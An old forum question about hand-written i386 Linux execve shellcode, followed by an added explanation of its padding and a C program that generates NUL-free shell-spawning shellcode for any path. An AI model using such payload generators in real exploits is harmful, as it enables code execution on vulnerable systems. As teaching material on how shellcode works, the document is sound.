
June 8th, 2003, 05:35 PM
not a fan of fascism (n00b)
Join Date: Feb 2003
Location: ct
writing opcodes
When you want to write a shellcode string, normally we do this to execute /bin/sh:
Code:
08049376 <op2>:
 8049376:       31 c0                   xor    %eax,%eax
 8049378:       50                      push   %eax
 /* push "//sh" onto the stack */
 8049379:       68 2f 2f 73 68          push   $0x68732f2f
 /* push "/bin" onto the stack */
 804937e:       68 2f 62 69 6e          push   $0x6e69622f
 8049383:       89 e3                   mov    %esp,%ebx
 8049385:       50                      push   %eax
 8049386:       53                      push   %ebx
 8049387:       89 e1                   mov    %esp,%ecx
 8049389:       99                      cltd
 804938a:       b0 0b                   mov    $0xb,%al
 804938c:       cd 80                   int    $0x80
But let's say instead I want to execute /bin/ship:
Code:
0804935c <op_codes>:
 804935c:       31 c0                   xor    %eax,%eax
 804935e:       50                      push   %eax
 /* here we can only push "/shi" */
 804935f:       68 2f 73 68 69          push   $0x6968732f
 /* now what is going on? what happens to /bin? */
 8049364:       74 68                   je     80493ce <_DYNAMIC+0x3a>
 8049366:       2f                      das
 8049367:       62 69 6e                bound  %ebp,0x6e(%ecx)
 /* now back to normal */
 804936a:       89 e3                   mov    %esp,%ebx
 804936c:       50                      push   %eax
 804936d:       53                      push   %ebx
 804936e:       89 e1                   mov    %esp,%ecx
 8049370:       99                      cltd
 8049371:       b0 0b                   mov    $0xb,%al
 8049373:       cd 80                   int    $0x80
* The string "/bin/ship" is 9 bytes long. It can't be pushed onto the stack with only 2 pushes. Instead something different happens, but I don't understand what?
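The listings above only push 4 bytes per `push $imm32`, so a path whose length is not a multiple of 4 has to be padded. In the /bin/sh case that is done by writing "//sh" instead of "/sh" (the kernel collapses repeated slashes, so "/bin//sh" still resolves). In the second listing the bytes 74 68 2f 62 69 6e that follow the `push $0x6968732f` are simply the ASCII of "th/bin" left inline in the instruction stream, which is why objdump decodes them as `je`, `das` and `bound`; they never reach the stack. The following C program is an added example, not code from the original post: it generates the same i386 Linux execve shellcode for any path by inserting extra '/' before the last path component until the length is a multiple of 4, pushes the chunks last-first, and decodes the result back to show what ends up on the stack. The padding scheme (extra slashes before the last component) and the helper names are this example's own choices; the opcode bytes are the ones in the posted listings.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed prologue and epilogue, byte-for-byte from the posted /bin/sh listing. */
static const uint8_t PROLOGUE[] = { 0x31, 0xc0,   /* xor %eax,%eax            */
                                    0x50 };       /* push %eax (NUL terminator)*/
static const uint8_t EPILOGUE[] = { 0x89, 0xe3,   /* mov %esp,%ebx  (path)    */
                                    0x50,         /* push %eax      (NULL)    */
                                    0x53,         /* push %ebx      (argv[0]) */
                                    0x89, 0xe1,   /* mov %esp,%ecx  (argv)    */
                                    0x99,         /* cltd           (envp=0)  */
                                    0xb0, 0x0b,   /* mov $0xb,%al   (execve)  */
                                    0xcd, 0x80 }; /* int $0x80                */

/* Build i386 Linux execve(path, {path, NULL}, NULL) shellcode for any path.
 * The path is padded with extra '/' before its last component until its
 * length is a multiple of 4 (repeated slashes are collapsed by the kernel),
 * then pushed in 4-byte chunks, last chunk first, so it sits in memory in
 * order and is terminated by the NUL pushed in the prologue.
 * Returns the number of bytes written, or 0 if path or out is unusable. */
size_t build_execve_shellcode(const char *path, uint8_t *out, size_t cap)
{
    char padded[256];
    size_t len = strlen(path);
    size_t pad = (4 - len % 4) % 4;
    const char *slash = strrchr(path, '/');
    size_t at = slash ? (size_t)(slash - path) : 0;  /* where the extra '/' go */
    size_t total = len + pad;
    size_t need = sizeof PROLOGUE + (total / 4) * 5 + sizeof EPILOGUE;
    size_t n;

    if (len == 0 || total > sizeof padded || need > cap)
        return 0;
    memcpy(padded, path, at);
    memset(padded + at, '/', pad);
    memcpy(padded + at + pad, path + at, len - at);

    memcpy(out, PROLOGUE, sizeof PROLOGUE);
    n = sizeof PROLOGUE;
    /* push $imm32 is 0x68 followed by the chunk in memory order: the immediate
     * and the pushed dword are both little-endian, so no byte swapping. */
    for (size_t off = total; off > 0; off -= 4) {
        out[n++] = 0x68;
        memcpy(out + n, padded + off - 4, 4);
        n += 4;
    }
    memcpy(out + n, EPILOGUE, sizeof EPILOGUE);
    return n + sizeof EPILOGUE;
}

/* Recover the path as it would sit on the stack: walk the push $imm32
 * instructions after the prologue and lay their chunks out in reverse push
 * order.  Returns the path length, or 0 if the layout is not recognised. */
size_t decode_pushed_path(const uint8_t *sc, size_t n, char *out, size_t cap)
{
    size_t i = sizeof PROLOGUE, chunks = 0;
    if (n < i || memcmp(sc, PROLOGUE, i) != 0)
        return 0;
    while (i + 5 <= n && sc[i] == 0x68) { i += 5; chunks++; }
    if (chunks == 0 || chunks * 4 + 1 > cap)
        return 0;
    for (size_t c = 0; c < chunks; c++)   /* c-th push lands (chunks-1-c)*4 in */
        memcpy(out + (chunks - 1 - c) * 4, sc + sizeof PROLOGUE + c * 5 + 1, 4);
    out[chunks * 4] = '\0';
    return chunks * 4;
}

/* Count NUL bytes: a strcpy-style delivery would truncate at the first one. */
size_t count_nul_bytes(const uint8_t *sc, size_t n)
{
    size_t k = 0;
    for (size_t i = 0; i < n; i++)
        if (sc[i] == 0) k++;
    return k;
}

int main(void)
{
    uint8_t sc[128];
    char path[64];
    size_t n = build_execve_shellcode("/bin/ship", sc, sizeof sc);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", sc[i], i + 1 == n ? '\n' : ' ');
    decode_pushed_path(sc, n, path, sizeof path);
    printf("%zu bytes, %zu NULs, path on stack: \"%s\"\n",
           n, count_nul_bytes(sc, n), path);
    return 0;
}
```

For "/bin/sh" the builder reproduces the 24 posted bytes exactly; for "/bin/ship" it emits three pushes ("ship", "////", "/bin") for 29 bytes with no NUL, and the decoded path is "/bin////ship".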